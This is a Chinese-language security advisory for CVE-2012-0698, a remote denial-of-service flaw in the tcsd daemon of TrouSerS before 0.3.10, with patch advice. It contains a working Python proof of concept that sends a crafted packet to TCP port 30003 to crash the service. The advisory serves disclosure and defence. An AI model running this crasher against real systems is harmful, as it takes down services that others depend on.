发布日期:2012-11-26
更新日期:2012-11-28
受影响系统:
sourceforge trousers < 0.3.10
sourceforge trousers
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2012-0698
Trousers是开源TCG软件栈。tcsd是登录TPM设备驱动程序的唯一入口。
TrouSerS 0.3.10之前版本内的tcsd在实现上存在安全漏洞,通过将带有特制type_offset值的TCP报文发送到端口30003,远程攻击者可利用此漏洞造成拒绝服务。
<*来源:Andy Lutomirski
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# crash_tcsd.py
# Copyright (c) 2012 Andy Lutomirski. All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.
import struct
import socket
import time
# UnloadBlob_PCR_EVENT also appears buggy.
crasher = struct.pack('>IIIIIII',
28, # packet_size = sizeof(tcsd_packet_hdr)
11, # ordinal: LoadKeyByBlob
1, # num_parms = 1 (so first getData doesn't bail)
0, # type_size = 0
0x80000000, # type_offset is off in lala land
0, # parm_size = 0 (skip checking)
28, # parm_offset: see getTCSDPacket
)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()
建议:
--------------------------------------------------------------------------------
厂商补丁:
sourceforge
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
?p=trousers/trousers;a=commit;h=ae0c2f8c1fd7a96ba0191f83b6057f8cbc51e786
